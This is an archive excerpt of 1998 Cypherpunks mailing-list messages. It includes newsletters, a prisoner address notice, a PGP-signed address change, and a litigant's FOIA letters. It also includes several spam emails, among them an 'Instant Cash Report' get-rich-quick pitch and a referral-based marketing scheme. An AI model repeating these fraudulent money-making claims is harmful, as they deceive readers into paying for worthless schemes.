their godamn shoes, and when they asked for help in a 
post to the CypherPunks list, they got a hundred anonymous 
emails from assholes telling them to, "Check the archives."
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: netcenter-news@netscape.com
Date: Mon, 29 Jun 1998 22:39:42 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: Netcenter News - Volume 8 - July 1998
Message-ID: <199806300539.WAA26479@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


  
 

Title: Netscape Netcenter News - July 1998








































Welcome to Netcenter
Netcenter is dedicated to the proposition that you should be able to find everything you need online in one place. This newsletter is one of the free benefits you receive for registering with a Netcenter program.



























Employers! Job seekers! Post a job or resume, browse job listings, promote your company, or get career information easily with Netcenter's new Career Center.























A beta version of Netscape Communicator 4.5 will be available to the public in early July. This latest version of Communicator will include improvements such as Smart Browsing as well as enhanced messaging and roaming access.














 



 

 
A 1998 SPA Codie Award Winner, Netscape Publishing Suite is now just $49.95 ($129.95 value). Get MasterClips 33,000 or Net Accelerator for just $10 with purchase.
















Netscape respects your online time and Internet privacy. If you would
prefer not to receive the monthly Netcenter News, please go to the Netscape
section of In-Box Direct and uncheck the Netcenter News
item. You may also, click here to send an unsubscribe email
or reply to this message with the word unsubscribe in the subject line.



Copyright (c) 1998. 
Netscape Communications Corporation.
All rights reserved.





























NETSCAPE 
NETCENTER: 
YOUR 
SPRINGBOARD 
TO 
THE 
INTERNET



Jump from here. That's the launch-point attitude at Netcenter's new Internet portal. Starting in July, Netcenter will incorporate 16 new business and consumer channels, along with a variety of new services. From downloading software upgrades automatically to sending flowers, Netcenter channels offer immediate access to goods, services, and a wealth of information.
 
Among the new services, Smart Browsing is designed to help you navigate the tricky waters of the Internet. With Internet Keywords, simply type a word such as "Ford" and blast to Ford's site. What's Related displays a list of dynamic links to related sites - great for online research or shopping. Netscape Search & Directory boosts your searches with a complete line-up of search engines in one location. Use My Netscape to design your "home on the web," a personalized home page that displays the information you use every day - news, stock quotes, sports, and more - the moment you log on. WebMail, Netcenter's free email service, allows you to respond to messages automatically and to integrate your organizer's address book with your email. Members can scan incoming attachments for viruses and even be paged when they receive high-priority messages.
 
Netscape Netcenter. Dive in - the water's fine.




SmartUpdate is expanding! Netscape has signed agreements with more than 20 leading software companies to make their products available, free of charge, for automatic download via the SmartUpdate service.




Netcenter members can SAVE $10 on all software at Netscape Software Depot by software.net. Limited time offer!




Join Member Directory and choose your Netcenter member name now - before the Netcenter 2.0 rush. Then, search for friends or new acquaintances.




Thanks to everyone who took part in last month's survey about online communities!
Here is what 2000 of you told us:

In general, newsgroups and instant messaging are more popular than chat.
Only 15 percent of you hadn't tried any kind of online community.


Of those who do visit communities, 44 percent go daily and 20 percent go several times
a day.


The thing you like most about your visits is the ability to see what other
people are thinking.


The most popular forum in Netcenter's Professional Connections is the Product
Center.

This month's survey is about customizing web pages. We invite you to tell us what you'd like to see in a personalized home page!


















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cyp@cyp.dcl.com
Date: Mon, 29 Jun 1998 22:54:58 -0700 (PDT)
To: cypherpunks-unedited@toad.com
Subject: Info on Jim Bell
Message-ID: <435jfhdhfds3dcl.com>
MIME-Version: 1.0
Content-Type: text/plain


  Jim has been arrested again and he is in the Federal Detention Center
  at Seattle. Jim wants people to write him at:

    James Bell #26906086
    Federal Detention Center
    P.O. Box 68976
    Seattle WA 98168




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@acm.org>
Date: Mon, 29 Jun 1998 21:20:05 -0700 (PDT)
To: cme@acm.org
Subject: change of address
Message-ID: <3.0.3.32.19980630001829.04c56ee8@pop3.clark.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I am moving from CyberCash.

Until I get the new work account set up in a month or so, please replace

cme@cybercash.com

with

cme@acm.org

Thanks,
	Carl

-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.5.3

iQA/AwUBNZhnFJSWoQShp/waEQJYKwCeIDZe9E67VOL2fin2L2unLYJfhCQAnRfL
HFncaiI5a/n/rpBAEO2zgavF
=pU5t
-----END PGP SIGNATURE-----


+------------------------------------------------------------------+
|Carl M. Ellison       cme@acm.org    http://www.clark.net/pub/cme |
|    PGP: 08FF BA05 599B 49D2  23C6 6FFD 36BA D342                 |
+-Officer, officer, arrest that man. He's whistling a dirty song.--+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: specialnews4u@usa.net
Date: Tue, 30 Jun 1998 01:16:36 -0700 (PDT)
To: specialnews4u@usa.net
Subject: PERSONAL NOTICE
Message-ID: <199806300816.BAA27797@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


HI. I APOLOGIZE FOR THIS INTRUSION ,    
BUT YOU MAY THANK ME FOR THIS .

COULD YOU USE AN EXTRA $ 25,000  NEXT WEEK  ? 
                                  
THEN  GIVE ME ONE MINUTE OF  YOUR TIME...   

IT MIGHT  BE WORTH A MILLION DOLLARS   

Dear Friend, 

My name is David Ross and I need YOU.

Let me explain

I reside in an island paradise . I entertain on a 75 ft. yacht . 
I travel the world by private lear jet .
I drive 8 cars including two Ferraris,  a Rolls Royce Corniche 
and a 1955 gull wing Mercedes worth over a million dollars. 
I party with supermodels , world famous celebrities and diplomats.
Banks are constantly trying to lend me money at prime rates..
but I don't need them any more. 

However, it wasn't always like this.

Until 1995 I was working for the telephone company .
I drove a 1989 Chrysler LeBaron and had over $50,000 
in revolving debt.
It seemed that I would never get ahead and was doomed 
to be a loser .

In my spare time I studied every money making system out there.
In fact , I often ordered 10 new money making systems a month.
I guess this is one of the main reasons I was so over extended 
on my credit cards.
You could say that my single obsession was investigating profit systems .

Then , one day , I was doing research on grants at the library.
I accidentally discovered something that all the B.S.money making books 
never mentioned  This simple discovery brought in:
$1,876.89  FOR THREE HOURS WORK !

Over the next 5 weeks , 
I proved to myself that this method worked 
time after time....EVERY TIME !  
Then , at the beginning of the next month, 
I opened my bank statement. 
My jaw dropped opened to discover that there was

$ 265,832.91  IN MY CHECKING ACCOUNT ! 

I had discovered  a secret program  
that virtually forced people to give me money ! 

After a period of  11 incredibly exciting months , 
I discovered that I had made

$ 1,454,742.39   
working about three hours per night from home.

All without spending a dime on office rent or employees, 
and while keeping my current job.....
which I soon quit after many  years 
( to hell with the pension and benefits ) . 
Then I made another exciting break through !  
I thought,

" WOW.... ANYBODY COULD DO THIS..
   IF THEY ONLY KNEW HOW ! "

This has lead me to an even faster and easier way 
to get richer : WORKING WITH PEOPLE JUST LIKE YOU ! 
I am going to help a few others 
DO EXACTLY THE SAME THINGS I HAVE DONE ! 
AND PROFIT RIGHT ALONG WITH YOU FROM 
YOUR OWN POWERFUL RESULTS !
I've  developed a comprehensive , easy to understand  
PRIVATE REPORT .  A complete

STEP BY STEP , FOOLPROOF BLUEPRINT   
FOR YOUR VERY OWN PERSONAL CASH MACHINE

THE  INSTANT CASH REPORT 
is just like having a legal printing press to  

MAKE SERIOUS MONEY ANYTIME YOU WANT !  
SIMPLE INSTRUCTIONS   WORK FROM HOME , 
OR  ANYWHERE ELSE YOU WANT TO BE.
GUARANTEED  

Are you skeptical ? I understand. So was I ..at first.
SO PLEASE ... DON'T TAKE MY WORD FOR IT.    
SEE FOR YOURSELF  

TEST IT OUT     ABSOLUTELY RISK FREE !
 In fact..you  WILL be completely convinced that this system
WILL make you at least 10,000 times what you paid for the report 
or I'll send you your money back..
NO QUESTIONS ASKED . EVEN ONE YEAR LATER .

GUARANTEED  .   

Frankly, I don't know why anybody would want to waste  time
 .....but I am that confident. 
Take a full year to TEST THIS SYSTEM 
and if you're not 100 % SATISFIED 
during your one year NO RISK TRIAL...
 I' LL SIMPLY REFUND EVERY PENNY TO YOU. 
You just can't lose !

SHORT ON START UP CASH ?  NOT A PROBLEM ! 

The administrative  cost for personally registering 
your  Instant Cash Report to you is just $ 49.95  
And you can put this program to work IMMEDIATELY . 
Your profits should be rolling in  WITHIN DAYS .

REMEBER... IF YOU WANT SOMETHING YOU'VE NEVER HAD..
YOU MUST DO SOMETHING YOU'VE NEVER DONE.. 

AND LETS FACE IT...THE TIME IS NOW .

BE AMONG THE FEW TO PROFIT 
ON THIS AMAZING OPPORTUNITY 
WHILE IT LASTS

I GUARANTEE YOU  > 
The Instant Cash report can be your ticket to
 A NEW LIFE ..just like it was for me.
Obtain the kind of freedom and retirement 
that you deserve .. Please..forget social security.

MAKE IT ALL NOW  WORKING FROM HOME 
JUST A FEW HOURS PER DAY !

But I urge you to act now..
New regulations may soon eliminate this opportunity forever , 
THEREFORE...TO INSURE  MAXIMUM  RESULTS 
FOR MY PARTICIPANTS 
I AM LIMITING THE DISTRIBUTION 
OF THE INSTANT CASH REPORT TO THOSE
WHO WILL USE IT WISELY AND ARE SERIOUS 
ABOUT ENDING THEIR FINACIAL CONCERNS .....FOR LIFE !  

THIS OFFER WILL BE WITHDRAWN WITHOUT NOTICE.
RESPOND TODAY

SO  NOW ..YOU DECIDE.  

WHICH  DO YOU  PREFER ...
TO KEEP .WORKING HARD  ? ..
OR START WORKING SMART !  

HERE'S HOW TO GET STARTED WORKING SMART  > >

Note: You must agree to remit 5 % of your gross revenues 
          from Instant Cash to my company.  
          You nust sign an agreement promising not to divulge
           its contents to anybody else .
           Because of the explosive nature of this program, 
           it is necessary to limit distribution .
           In order to maximize the results for all participants. 
           This offer will soon be discontined without further notice . 
            I urge you to act now .

METHOD OF PAYMENT IS BY CHECK DRAFT FACSIMILE ONLY  
                               
1.  MAKE OUT YOUR CHECK FOR  $ 49.95  ( U.S ) TO :   
 
     ARIEL PUBLISHING GROUP
                                                                    
2.  IN THE LOWER LEFT CORNER OF THE CHECK PRINT: 

     INSTANT CASH REPORT
    ( make sure you sign and date the check ) 

3.  ATTACH YOUR CHECK TO A FAX COVER PAGE . 

4.  ON THE FAX COVER PAGE PRINT THE FOLLOWING :

      ATTENTION  DAVID. ROSS  DEPT. IC441
      PLEASE SEND ME THE INSTANT CASH REPORT. 
      I HEREBY AGREE NOT TO DIVULGE  ANY PART OF ITS 
      CONTENTS TO THIRD PARTIES. I ALSO AGREE TO PAY 
      5 PER CENT OF THE PROFITS FROM INSTANT CASH TO :
      ROSS ENTERPRISES INC.

NEXT.... SIGN YOUR NAME DIRECTLY UNDER THAT STATEMENT. 
THEN ....CLEARLY PRINT:  YOUR NAME , 
FULL MAILING  ADDRESS ,ZIP/POSTAL CODE , 
YOUR PHONE NUMBER  AND E-MAIL ADDRESS

(  Sorry,  no orders can be processed unless
 the instructions above are followed exactly              
Please do not respond to this note via e-mail
Due to the actions of anti - commercial e-mail
vandals , we do not maintain an e-mail responder )              
    
4. FAX THIS MATERIAL TO :  
( 01 ) 404 - 685 - 0905  (  for best results : dial then press "send" )

SHIPPED  BY FIRST CLASS  MAIL . 

Ariel Publishing Group is not affiliated with Ross Enterprises 
or any other entity. Ariel Publishing Group makes no claim or 
warranty regarding the content , nature or intended use of this material  . 

Copyright 1998  Ariel Publishing Group Ltd.                              . 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@tour.unitymail.com>
Date: Tue, 30 Jun 1998 10:07:23 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@tour.unitymail.com>
Subject: CTIA Daily News from WOW-COM - June 30, 1998
Message-ID: <199806301704.MAA30266@revnet4.revnet.com>
MIME-Version: 1.0
Content-Type: text/plain



=============================================
Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon / attachment
for the most important news in wireless communications today.
=============================================


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Tue, 30 Jun 1998 11:52:45 -0700 (PDT)
To: senator@torricelli.senate.gov
Subject: Settlement help, please
Message-ID: <359932F0.2232@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Senators

Please help get this mess settled.

Thanks
bill


Tuesday  6/30/98 12:03 PM

Mr. Thomas J. Schlageter, Assistant  Legal Counsel
Advice and External Litigation Division
Office of Legal Counsel
1801 L. Street, Northwest, Room 6034
Washington, D.C. 20507

Dear Mr. Schlageter: 

Purposes of this letter are to

1  seek administrative remedy of a release of false and defaming information on myself  which violated Privacy 
Act.   Charles Burtner and Larry Trujillo of the U.S. Equal Employment Opportunity Commission's (EEOC)  
Phoenix District Office unlawfully released the information.

2  Exhaust administrative remedies if we are not able to settle this matter.

3  Request information under the Freedom of Information and Privacy Acts.

On June 29 I received at letter from

Aletha L. Brown 
Inspector General
U.S. Equal Employment Opportunity Commission
POB 18858
Washington, D.C. 20036-8858
202-663-4375
800-849-4230

dated June 25, 1998, OIG Control Number 981770 which said

  This is to acknowledge receipt for your letter dated May 15, 1998, requesting Freedom of Information Act     
  (FOIA) and Privacy Act information.  I apologize for the delay in responding to your request.

  Your complaint regarding alleged Privacy Act violation and FOIA request was forwarded to the Office of
  Legal Counsel on May 27, 1998.  With regards to these matters, please contact:

	Mr. Thomas J. Schlageter, Assistant
	   Legal Counsel
	Advice and External Litigation Division
	Office of Legal Counsel
	1801 L. Street, Northwest, Room 6034
  	Washington, D,C, 20507

  Mr. Payne, the OIG plans no investigative action regarding this matter.  Thank you for contacting
  this office.

  Sincerely
 
  [signature]

  Aletha L. Brown
  Inspector General

  Attachment

Attachment reads

  U.S. EQUAL EMPLOYMENT OPPORTUNITY COMMISSION
		 Washington, D.C 20507

         		      May 27, 1998

  MEMORANDUM

  TO:   Mr. Thomas J. Schlageter, Assistant Legal Counsel
           Advice and External Litigation Division
	
               [signature]
  FROM  Joyce T. Willoughby, Counsel
               Office of the Inspector General

  SUBJECT:  Freedom of Information Act (FOIA) Request of William Payne

  Attached is a Freedom of Information (FOIA) request from William Payne, which
  was received by the Office of the Inspector General (OIG) on May 20, 1998.  In an
  effort to respond to this request, attached are copies of the OIG case file concerning Mr. Payne, 
  the Inspector General Act of 1978, as amended, and excerpts from the OIG Investigative Manual
  and Deskbook.

  If you have any question concerning this memorandum or need additional information you may
  contact me at Extension 4397.

  Attachments

While I hope we are able to settle the civil aspects of this unfortunate release of false and
defaming information on me, I must anticipate, however, that I will have to seek judicial
review.

Therefore, under 5 USC 552, the Freedom of Information Act, and 5 USC 552a, the Privacy Act, I request 
access to copies

1  All documents describing YOUR efforts to properly investigate and settle this unlawful release of false and 
defaming information about me.

2  All WRITTEN documents, including phone call message notes or another notes, containing the name of 
William Payne, Bill Payne, etc. made between 3/18/98 and 6/30/98 by your or your staff.

If all or any part of this request is denied, please cite the specific exemption(s) which you think justifies your 
refusal to release the information and inform me of your agency's administrative appeal procedures available to 
me under the law.

I would appreciate your handling this request as quickly as possible, and I look forward to hearing from you 
within 20 working days, as the law stipulates.

This letter resembles one I sent to Ms. Varygas of your office on 6/29.  I append the Varyas letter to
this letter for your information.

Mr. Schlageter,  I hope this unfortunate matter can be resolved at the administrative
level at EEOC.  And I ask your help.

Sincerely,



William H. Payne
13015 Calle de Sandias NE
Albuquerque, NM 87111
505 292 7037 <- I am not reading e-mail

Distribution
Tom Spellman
Aletha L. Brown 
Senate Judiciary Committee http://www.senate.gov/committee/judiciary.html

Republicans

Orrin G. Hatch, Utah, Chairman   senator_hatch@Hatch.senate.gov
Strom Thurmond, South Carolina   senator@thurmond.senate.gov
Charles E. Grassley, Iowa   chuck_grassley@grassley.senate.gov
Arlen Specter, Pennsylvania   senator_specter@specter.senate.gov
Fred Thompson, Tennessee   senator_thompson@thompson.senate.gov
Jon Kyl, Arizona   info@kyl.senate.gov
Mike DeWine, Ohio   senator_dewine@dewine.senate.gov
John Ashcroft, Missouri   john_ashcroft@ashcroft.senate.gov
Spencer Abraham, Michigan   michigan@abraham.senate.gov
Jeff Sessions, Alabama

Democrats

Patrick J. Leahy, Vermont   senator_leahy@leahy.senate.gov
Edward M. Kennedy, Massachusetts   senator@kennedy.senate.gov
Joseph R.Biden, Jr., Delaware   senator@biden.senate.gov
Herb Kohl, Wisconsin   senator_kohl@kohl.senate.gov
Dianne Feinstein, California   senator@feinstein.senate.gov
Russell D. Feingold, Wisconsin   russell_feingold@feingold.senate.gov
Richard Durbin, Illinois   dick@durbin.senate.gov
Robert Torricelli, New Jersey   senator@torricelli.senate.gov

/\/\/\
append
-----
Monday 6/29/98 11:59 AM

Ms. Ellen J. Varygas, Legal Counsel
Office of Legal Counsel
1801 L. Street, Northwest, Room 6002
Washington, DC 20507
(202) 663-4637

Dear Ms. Varygas:

Purposes of this letter are to

1  seek administrative remedy of a release of false and defaming information on myself  which violated Privacy 
Act.   Charles Burtner and Larry Trujillo of the U.S. Equal Employment Opportunity Commission's (EEOC)  
Phoenix District Office unlawfully released the information.

2  Exhaust administrative remedies if we are not able to settle this matter.

3  Request information under the Freedom of Information and Privacy Acts.

Aletha L. Brown 
Inspector General
U.S. Equal Employment Opportunity Commission
POB 18858
Washington, D.C. 20036-8858
202-663-4375
800-849-4230

wrote me on May 7 1998 

  The Office of Inspector General (OIG) is empowered to investigate matters of fraud, waste
  and abuse which may be attendant to EEOC programs and operations.  We do not have
  programmatic responsibilities and are not involved in the administration and resolution
  of Privacy Act violations.

  Based upon our review of the information provided, we have determined that this matter,
  although important, is outside of OIG's purview and therefore does not warrant any  investigative action by   
  this office.  In regards to this issue contact:

	Ms. Ellen J. Varygas, Legal Counsel
  	Office of Legal Counsel
	1801 L. Street, Northwest, Room 6002
     	Washington, DC 20507
	(202) 663-4637

  Mr. Payne, I hope this information is helpful to you but regret that I can not provide the   remedy you seek.  

  Thank you for contacting the Office of the Inspector General.

  Sincerely,

  Aletha L. Brown
  Inspector General

June 16, 1998 A Jacy Thurmond, Jr, Assistant Legal Counsel/FOIA sent me some information
I requested on possible administrative remedy of the matter under a  FOIA/PA request.  My request was 
mailed Friday 5/15/98.

While I hope we are able to settle the civil aspects of this unfortunate release of false and
defaming information on me, I must anticipate, however, that I will have to seek judicial
review.

Therefore, under 5 USC 552, the Freedom of Information Act, and 5 USC 552a, the Privacy Act, I request 
access to copies

1  All documents describing YOUR efforts to properly investigate and settle this unlawful release of false and 
defaming information about me.

2  All WRITTEN documents, including phone call message notes or another notes, containing the name of 
William Payne, Bill Payne, etc. made between 3/18/98 and 6/29/98 by your or your staff.


If all or any part of this request is denied, please cite the specific exemption(s) which you think justifies your 
refusal to release the information and inform me of your agency's administrative appeal procedures available to 
me under the law.

I would appreciate your handling this request as quickly as possible, and I look forward to hearing from you 
within 20 working days, as the law stipulates.

Details of the release of information can be found on Internet starting most recently with

      Payne v. NSA: US on Classified NSA Declaration    June 27, 1998
      Payne v. NSA: US Motion on FOIA for NSA Algos     June 27, 1998

at http://www.jya.com/usa062698.htm

Ms Varygas,  I hope this unfortunate matter can be resolved at the administrative
level at EEOC.  And I ask your help.

Sincerely,



William H. Payne
13015 Calle de Sandias NE
Albuquerque, NM 87111
505 292 7037 <- I am not reading e-mail

Distribution
Tom Spellman
Aletha L. Brown 
Senate Judiciary Committee http://www.senate.gov/committee/judiciary.html

Republicans

Orrin G. Hatch, Utah, Chairman   senator_hatch@Hatch.senate.gov
Strom Thurmond, South Carolina   senator@thurmond.senate.gov
Charles E. Grassley, Iowa   chuck_grassley@grassley.senate.gov
Arlen Specter, Pennsylvania   senator_specter@specter.senate.gov
Fred Thompson, Tennessee   senator_thompson@thompson.senate.gov
Jon Kyl, Arizona   info@kyl.senate.gov
Mike DeWine, Ohio   senator_dewine@dewine.senate.gov
John Ashcroft, Missouri   john_ashcroft@ashcroft.senate.gov
Spencer Abraham, Michigan   michigan@abraham.senate.gov
Jeff Sessions, Alabama

Democrats

Patrick J. Leahy, Vermont   senator_leahy@leahy.senate.gov
Edward M. Kennedy, Massachusetts   senator@kennedy.senate.gov
Joseph R.Biden, Jr., Delaware   senator@biden.senate.gov
Herb Kohl, Wisconsin   senator_kohl@kohl.senate.gov
Dianne Feinstein, California   senator@feinstein.senate.gov
Russell D. Feingold, Wisconsin   russell_feingold@feingold.senate.gov
Richard Durbin, Illinois   dick@durbin.senate.gov
Robert Torricelli, New Jersey   senator@torricelli.senate.gov




6






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Tue, 30 Jun 1998 11:59:47 -0700 (PDT)
To: jy@jya.com
Subject: NSA and crypto algorithms
Message-ID: <359934DE.1B4@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


It is EASY to make mistakes when designing crypto algorithms.

SECRECY works against NSA in that their work doesn't get 
proper evaluation by HOSTILE referees.  Like
http://www.jya.com/skipjack-bs2.htm

NSA does have good experiences at fielding crypto devices.

My suprise at gaining access to NSA crypto algorithms was how
simple they were.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Gamble <agamble@alloytech.com>
Date: Tue, 30 Jun 1998 12:46:36 -0700 (PDT)
To: webmaster@suppliersonline.com
Subject: Metal Suppliers Online Newsletter
Message-ID: <3.0.32.19980630144255.009e7180@mail.alloytech.com>
MIME-Version: 1.0
Content-Type: text/plain


June 30, 1998

Metal Suppliers Online (MSO) Summer Newsletter

Hello from rainy New Hampshire! Its been a great year here at MSO and I
wanted to get this newsletter out  to remind you about Metal Suppliers
Online (www.suppliersonline.com) and bring you up to date with site
improvements. We now have over 12,000 worldwide users (!) .

RECENT IMPROVEMENTS INCLUDE:

Metal Supplier Data - We continue to grow, with the searchable inventory of
2700 Worldwide Distributors, Producing Mills and Forging Shops.

Material Property Data - We now property data  on 17,000 ferrous &
non-ferrous materials.


UP-COMING IMPROVEMENTS INCLUDE:

Specification Cross Reference Utilities - Cross reference any ASTM, ASME,
AMS, QQ, MIL and selected company specifications.

Physical Property Data - CTE, Densities, Conductivity, Resistivity & more.

Specification Cross Reference Utilities - Cross reference any ASTM, ASME,
AMS, QQ, MIL and selected company specifications.


If you haven't been to the site in a while, I invite you to give us a
visit. I think that you'll be impressed by the way that we've grown.

If you have any recommendations on how to improve our site, please don't
hesitate to Email them to me.

Thanks for your time.

Best Regards,

Alan 
Alan C. Gamble
Webmaster                   
Metal Suppliers Online

http://www.suppliersonline.com

603-890-6500 - phone
603.890.6222 - fax

"We don't stop playing because we get old, we get old because we stop playing"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Tue, 30 Jun 1998 14:46:45 -0700 (PDT)
To: alicezim@metriguard.com
Subject: Judge Campos letter
Message-ID: <35995BF1.156C@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Tuesday 6/30/98 3:20 PM

John Young

Nice to talk to you.

I see

 Payne v. NSA: Response to Motion to Remand FOIA   June 30, 1998

at http://www.jya.com/whp063098.htm

I opened judge Campos' letter at the fax.  I handed it to the nice
lady.

I wrote your fax number on the envelope.

Then went to Page One Two to look at used VW repair manuals.

Page One Two specializes in used books and CDs.

I am REALLY CURIOUS about what Campos wrote.  Especially on a
Tuesday.  But not curious enough to read the letter now.

Lawyers always plan to have their hate letters arrive on a weekend
or, just before a vacation.  Christmas is a lawyer favorite.

I ordered a engine rebuild gasket set, rod and main bearings, engine
mounts, rings, valve guides and springs, and SPLURGED by ordering an
exhuast header this afternoon.

My '82 rabbit is about guaranteed to fail emissions test this fall.

I ordered today from J C Whitney because the price for the $99.95
header goes up $10 tomorrow.  Perhaps headers will even FURTHER
improve its exciting 20 second 0-60 performance?

I will do the rebuilt in the fall.  

I phoned a member of Albuquerque's underground economy last night.
He will do the labor on the head for $60.  Cash, of course.

I must now ABSOLUTE CERTAINLY complete the digital FX IMMEDIATELY.  
To make some money.

Litigation is more of a long term financial project.  Like Morales and I
have been working on this project for SIX YEARS.

Hopefully this mess will be settled so that I can devote time to another
of my specialties.  Rebuilding Big Block Ford and VW water cooled
engines.  And writing MORE books too.  

Perhaps even write a law book. On pro se litigation.  With Morales, of
course.  But this can be a point for settlement negotiation, of course.  

Later
bill

http://www.apcatalog.com/cgi-bin/AP?ISBN=0125475705&LOCATION=US&FORM=FORM2






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nodebt@mail-info.com
Date: Tue, 30 Jun 1998 18:18:41 -0700 (PDT)
To: nodebt@mail-info.com
Subject: A *Gold-Mine*--Right Under Your Nose?!!
Message-ID: <<>
MIME-Version: 1.0
Content-Type: text/plain


A *Gold-Mine*--Right Under Your Nose?!! 

Take just a minute and look down.  What do you see?  

A thin plastic board with keys on it?  How would you feel 
if I told you those keys were lined with gold?  

Well, it's true!  The keys on your keyboard are FILLED
with PURE GOLD--just sitting there waiting for you to mine
it out!

How?

The Internet...Online Mass Marketing.

With the potential to reach millions, the Internet is the
perfect place to market a product or an idea.  And, the
wonderful thing is that you can have as great a presence
on the World Wide Web as the biggest of the big
corporations, perhaps even greater--

IF YOU HAVE THE TOOLS - and - 
IF YOU KNOW HOW TO USE THEM!

>>>>>>>>>>>LEVEL THE PLAYING FIELD!
>>>>>>>>>>>>>>>WE TEACH YOU HOW!

That is why I want to tell you about Online Success.

Online Success is a resource center dedicated to
providing you with the tools to cash in on the
TREMENDOUS OPPORTUNITIES to be found through
mass Internet marketing-AND-teaching you how to
use them.

It may be far easier then you think...
if you know the inside secrets. 

As a member of the Online Success group, you will have
the constant support of a staff of highly experienced
Internet marketers.  You will be carefully guided step by
step along your path to AMAZING PROFITS through online
marketing success.

>We track the hottest trends so you can reap the profits!

A few examples of what we offer:

>Placement of your ad in 100 of the 
HOTTEST online classifieds.

>Registration of your web-site with the 
TOP 100 search engines.

>Dedicated E-mail account, autoresponder, 
and webspace.

>Your own web-site DOMAIN NAME--FREE to members!
 (An absolute must!)


You will also gain access to the Online Mass Marketing
Institute where you will learn how to make the web work 
for you.

You have no product to offer?  No problem!  

Online Success can even provide you with that!

***And now for the truly amazing Part!***

All of this can be yours for FREE simply by referring two
other individuals that become active Online Success
members!

As a matter of fact, we will PAY YOU a 40% commission
on any additional active referrals!

Imagine that!  MAKE MONEY while you learn how to 
MAKE MONEY!

So, why not see how easy it is to mine that wealth of gold
from your keyboard--with the help of Online Success.

Come to our web-site at:

http://www.mail-info.com/osg/109

Find out what it's all about and start down your path to
Internet marketing prosperity!

>>>>>>>>>>>>>You make it happen.
>>>>>>>>>>>>>Online Success makes it possible.

Thank You,

Karen Flowers

Ref # 109
nodebt@mail-info.com
http://www.mail-info.com/osg/109
   
  
P.S. Join NOW and we will ALSO include 250 HOT 
Internet and Business Marketing Reports with 
FULL reprint and resale rights...FREE!

This is NOT some simple collection of raw ideas. 
These reports are being sold on the Internet right 
NOW for $49.95!  YOU can become an INSTANT self 
publisher by selling these reports!

P.S.S. We will also include FREE (a $50 value), the 
stand alone report: 

"How To Make $1,600 A Week Online...Starting NOW!"

This report contains the SECRETS to making money 
online that the Internet marketing insiders DON'T 
want YOU to know!

HURRY! This offer from Online Success is for a 
LIMITED time. Make sure you DO NOT miss this new 
and exciting opportunity that will take the Internet 
by storm!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Threadgill <richardt@midgard.net>
Date: Tue, 2 Jun 1998 14:02:09 -0700 (PDT)
To: cypherpunks-announce@toad.com
Subject: subscribe richardt@midgard.net
Message-ID: <29466.896821142@yggdrasil.midgard.net>
MIME-Version: 1.0
Content-Type: text/plain






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rescue9111@hotmail.com
Date: Wed, 3 Jun 1998 04:29:59 -0700 (PDT)
To: Friend@public.com
Subject: 10-03
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain








                                      BENCHMARK PRINT SUPPLY
                                        1091 REDSTONE LANE
                                         ATLANTA GA 30338

                      FOR ORDERS/PRICING ONLY PLEASE CALL (770)399-0953
                  CUSTOMER SERVICE/SUPPORT ISSUES PLEASE CALL (770)399-5505
                  FOR COMPLAINTS OR E-MAIL REMOVAL PLEASE CALL (770)399-5614



                      OUR  LASER PRINTER/FAX/COPIER TONER CARTRIDGES, PRICES
                                      NOW AS LOW AS $39 & UP
                    WE CARRY MOST ALL LASER PRINTER CARTRIDGES, FAX SUPPLIES
                         AND COPIER TONERS AT WAREHOUSE PRICES INCLUDING:

                     HEWLETT PACKARD SERIES 2/3/4/2P/4P/5P/4L/5L/3SI/4SI/5SI
                          IBM/LEXMARK OPTRA SERIES 4019/4029/4039/4049/4059
                              EPSON SERIES 2/1100/1500/6000/7000/8000
                                         NEC SERIES 90/95
                 CANON COPIER PC SERIES INCLUDING 3/6RE/7/11/320/720/10/20/25 ETC...
                        HP FAX SERIES 700/720/5000/7000/FX1/FX2/FX3/FX4/FX5
                                      CANON FAX ALL MODELS
            WE DO NOT CARRY : BROTHER - PANASONIC - XEROX - FUJITSU - OKIDATA - SHARP

                    PRICES DO CHANGE PERIODICALLY. PLEASE CALL TO GET THE MOST
                      RECENT PRICING/AVAILABILTY AND SPECIALS OF THE WEEK!!!!
                           ORDERS/PRICING LINE ONLY CALL (770)399-0953

                      *****NEW,NEW,NEW $10 MAIL IN REBATE ON ALL CARTRIDGES*****
                   ****SIMPLY ORDER YOUR NEW CARTRIDGE, WHEN IT ARRIVES MAIL BACK****                        
               ****YOUR REBATE CERTIFICATE WITH ANY USED CARTRIDGE FOR INSTANT CREDIT****


                           WE ACCEPT ALL MAJOR CREDIT CARDS OR COD ORDERS
                          CORPORATE ACCOUNTS AVAILABLE WITH APPROVED CREDIT
                     ALL PACKAGES SHIPPED UPS GROUND UNLESS SPECIFIED OTHERWISE
                       
                      .

                               PLEASE NOTE: WE ARE CURRENTLY BUYING
                             HP-SERIES 5L - 5P - AND  4000 CARTRIDGES
                                   ALL LEXMARK OPTRA CARTRIDGES
                                    CANON PC COPIER CARTRIDGES
